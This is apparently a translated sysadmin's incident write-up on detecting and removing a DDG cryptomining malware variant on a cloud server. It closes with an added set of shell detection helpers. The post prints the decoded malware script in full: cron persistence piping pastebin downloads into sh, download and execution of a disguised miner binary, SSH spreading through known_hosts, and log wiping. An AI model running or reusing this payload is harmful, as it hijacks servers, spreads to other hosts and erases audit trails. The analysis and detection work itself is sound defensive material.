## Discovery: Alibaba Cloud email alert reporting excessive CPU usage.

## Checking the server

With top, CPU usage always read 0 and the per-process usage column showed nothing unusual. ps listed no suspicious processes, although some processes that were actually running did not appear; the services were still available.

Network check: connections existed, but no owning process was shown (the PID/Program name column is `-`).

```shell
# netstat -lanp
tcp 0 0 192.168.1.76:59410 39.106.0.27:22 ESTABLISHED -
tcp 0 0 192.168.1.76:36140 104.20.208.21:443 ESTABLISHED -
tcp 0 0 192.168.1.76:59416 39.106.0.27:22 ESTABLISHED -
tcp 0 0 192.168.1.76:52210 104.20.209.21:443 ESTABLISHED -
tcp 0 0 192.168.1.76:22 123.117.161.44:65494 ESTABLISHED 14810/sshd: root@pt
tcp 0 0 192.168.1.76:52360 104.20.209.21:443 ESTABLISHED -
tcp 0 0 192.168.1.76:36206 104.20.208.21:443 ESTABLISHED -
tcp 0 0 192.168.1.76:54964 104.20.209.21:443 ESTABLISHED -
tcp 0 0 192.168.1.76:35208 104.20.209.21:443 ESTABLISHED -
tcp 0 0 192.168.1.76:22 123.117.161.44:50914 ESTABLISHED 14723/sshd: root@pt
tcp 0 0 192.168.1.76:38038 100.100.18.22:3128 ESTABLISHED 12160/CmsGoAgent.li
tcp 0 0 192.168.1.76:36194 104.20.208.21:443 ESTABLISHED -
tcp 0 0 192.168.1.76:59402 39.106.0.27:22 ESTABLISHED -
tcp 0 0 192.168.1.76:59404 39.106.0.27:22 ESTABLISHED -
tcp 0 0 192.168.1.76:54944 104.20.209.21:443 ESTABLISHED -
tcp 0 0 192.168.1.76:59400 39.106.0.27:22 ESTABLISHED -
tcp 0 0 192.168.1.76:59408 39.106.0.27:22 ESTABLISHED -
tcp 0 0 192.168.1.76:54954 104.20.209.21:443 ESTABLISHED -
tcp 0 93 192.168.1.76:36216 104.20.208.21:443 ESTABLISHED -
tcp 0 0 192.168.1.76:59414 39.106.0.27:22 ESTABLISHED -
tcp 0 0 192.168.1.76:42143 104.20.208.21:443 ESTABLISHED -
tcp 0 0 192.168.1.76:59412 39.106.0.27:22 ESTABLISHED -
```

Cron job check:

```shell
# crontab -l
*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh
##
```

I cleared the job, but when I opened the crontab again it was back as before. At first I suspected some process was watching for the change and restoring it in real time; it later turned out to be the malware process itself.

**It filters common system functions (such as readdir and access): when the results would contain the malicious files and processes, it actively filters and hides them, so commands such as ls and ps cannot see the malicious process or its files.**

Content of the URL referenced by the cron job:

```
(curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|base64 -d|sh
```

Content after base64 decoding:

```shell
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" | crontab -
ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "kworkerds" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "watchdogs" | awk '{print $2}'|xargs kill -9
rm -rf /tmp/busybox
p=$(ps auxf|grep -v grep|grep ksoftirqds|wc -l)
if [ ${p} -eq 0 ];then
ps auxf|grep -v grep | awk '{if($3>=50.0) print $2}'| xargs kill -9
fi
if [ -e "/tmp/gates.lod" ]; then
rm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)
kill -9 $(cat /tmp/gates.lod)
rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)
kill -9 $(cat /tmp/moni.lod)
rm -rf /tmp/{gates,moni}.lod
fi
if [ ! -f "/tmp/.lsdpid" ]; then
ARCH=$(uname -m)
if [ ${ARCH}x = "x86_64x" ]; then
(curl -fsSL http://thyrsi.com/t6/675/1551444050x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444050x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
elif [ ${ARCH}x = "i686x" ]; then
(curl -fsSL http://thyrsi.com/t6/675/1551444102x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444102x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
else
(curl -fsSL http://thyrsi.com/t6/675/1551444102x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444102x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
fi
nohup /tmp/kthrotlds >/dev/null 2>&1 &
elif [ ! -f "/proc/$(cat /tmp/.lsdpid)/stat" ]; then
ARCH=$(uname -m)
if [ ${ARCH}x = "x86_64x" ]; then
(curl -fsSL http://thyrsi.com/t6/675/1551444050x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444050x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
elif [ ${ARCH}x = "i686x" ]; then
(curl -fsSL http://thyrsi.com/t6/675/1551444102x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444102x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
else
(curl -fsSL http://thyrsi.com/t6/675/1551444102x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444102x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
fi
nohup /tmp/kthrotlds >/dev/null 2>&1 &
fi
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do
ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh >/dev/null 2>&1 &' &
done
fi
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#
#
```

After that, the only trace I found was the file /tmp/.lsdpid; looking up the process whose PID it contained with the usual commands turned up nothing.

Checking the other cron locations turned up:

```
ll /etc/cron.d/
-rw-r--r-- 1 root root 117 03-04 09:58 root
-rw-r--r-- 1 root root 254 03-02 01:10 tomcat
```

These two files contained the same content as the crontab entry.

Searching online for these characteristics led to https://baijiahao.baidu.com/s?id=1626772574264851408&wfr=spider&for=pc : this is the DDG mining malware, and a variant of it at that.

## Removing the malware

Use busybox.

**Why can busybox clean up the files?**

busybox does not depend on the system's dynamic libraries, so it is not affected by the ld.so.preload hijack and can operate on the files normally.

```shell
# remove the cron persistence and the PID file the malware uses
busybox rm /var/spool/cron/root /etc/cron.d/root /etc/cron.d/tomcat /tmp/.lsdpid
# list processes with busybox; the suspicious process now shows up
busybox ps -ef
#   30548 root       1:52 /tmp/kthrotlds
# kill it by its PID
busybox kill -9 30548
```

With that the system is back to normal; top and ps display correctly again.

Last modified: 4 March 2019, 11:06 AM © Reposting permitted with proper attribution
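As an added example for this write-up (not the post author's commands and not part of the DDG malware), the following POSIX sh helpers check for the symptoms the post describes: ESTABLISHED connections that netstat cannot attribute to a process, PIDs that exist in /proc but are missing from ps, cron entries that fetch a remote script and pipe it into a shell, and entries in /etc/ld.so.preload. The function names, the placeholder paste URL and the example library path are assumptions; the sample netstat lines are copied from the post's output and the remaining sample data is constructed.

```shell
#!/bin/sh
# Added triage helpers for the symptoms described in the post (orphaned
# connections, processes hidden from ps, curl|sh cron entries, ld.so.preload).
# Example code written for this page, not the post author's commands.
# All sample inputs are constructed; nothing is downloaded, modified or killed.

# ESTABLISHED TCP connections whose PID/Program column is "-": the socket is
# live but no visible process owns it. Reads `netstat -lanp` output on stdin
# and prints "local remote" for each such connection.
orphan_connections() {
    awk '$1 ~ /^tcp/ && $6 == "ESTABLISHED" && $7 == "-" { print $4, $5 }'
}

# PIDs present in /proc but missing from ps output. A hooked readdir() hides
# entries from ps and ls, so gather the /proc list with a static binary
# (e.g. `busybox ls /proc`) as the post does. $1 = /proc PID list, $2 = ps PID
# list, both newline separated. Prints the PIDs that ps does not report.
hidden_pids() {
    _a=$(mktemp) || return 1
    _b=$(mktemp) || return 1
    printf '%s\n' "$1" > "$_a"
    printf '%s\n' "$2" > "$_b"
    awk -v psfile="$_b" 'FILENAME == psfile { seen[$1] = 1; next }
                          NF && !($1 in seen)' "$_b" "$_a"
    rm -f "$_a" "$_b"
}

# Crontab lines that fetch a remote script with curl or wget and pipe it into
# a shell or through base64 -d, the pattern seen in the post's crontab and
# /etc/cron.d files. Reads crontab text on stdin, prints matching lines.
flag_fetch_exec_cron() {
    grep -v '^[[:space:]]*#' |
        grep -E '(curl|wget)[^|]*\|[[:space:]]*(sh|bash|base64[[:space:]]+-d)'
}

# Non-empty entries of the preload file the post names as the hiding mechanism.
# On a server that never configured one, any entry is worth investigating.
# $1 = path (defaults to /etc/ld.so.preload). Returns 1 when there are none.
list_preload() {
    _pre="${1:-/etc/ld.so.preload}"
    [ -s "$_pre" ] || return 1
    grep -v '^[[:space:]]*$' "$_pre"
}

# --- constructed sample data ------------------------------------------------
# The first three netstat lines are copied from the post; the LISTEN line is
# made up for the demo.
SAMPLE_NETSTAT='tcp 0 0 192.168.1.76:59410 39.106.0.27:22 ESTABLISHED -
tcp 0 0 192.168.1.76:22 123.117.161.44:65494 ESTABLISHED 14810/sshd: root@pt
tcp 0 0 192.168.1.76:38038 100.100.18.22:3128 ESTABLISHED 12160/CmsGoAgent.li
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1032/sshd'
# PID 30548 (the miner in the post) is visible in /proc but not in ps.
SAMPLE_PROC_PIDS='1
12160
14810
30548'
SAMPLE_PS_PIDS='1
12160
14810'
# Placeholder paste URL (assumption); the real one is in the post above.
SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/15 * * * * (curl -fsSL https://paste.example/raw/XXXX||wget -q -O- https://paste.example/raw/XXXX)|sh'

echo "== ESTABLISHED connections with no visible owner =="
printf '%s\n' "$SAMPLE_NETSTAT" | orphan_connections
echo "== PIDs in /proc that ps does not report =="
hidden_pids "$SAMPLE_PROC_PIDS" "$SAMPLE_PS_PIDS"
echo "== cron entries that fetch and execute remote code =="
printf '%s\n' "$SAMPLE_CRON" | flag_fetch_exec_cron
echo "== entries in /etc/ld.so.preload on this host =="
list_preload || echo "(none)"
```

The post's cleanup removes the cron files and kills the miner, but the hiding itself comes from the preload entry the post mentions, so `list_preload` is the check to run before declaring the host clean; an entry that points at a library nobody installed is where the readdir/access filtering lives. The PID comparison only works when the /proc listing is taken with a binary that bypasses the preloaded library, which is exactly why the post reaches for busybox.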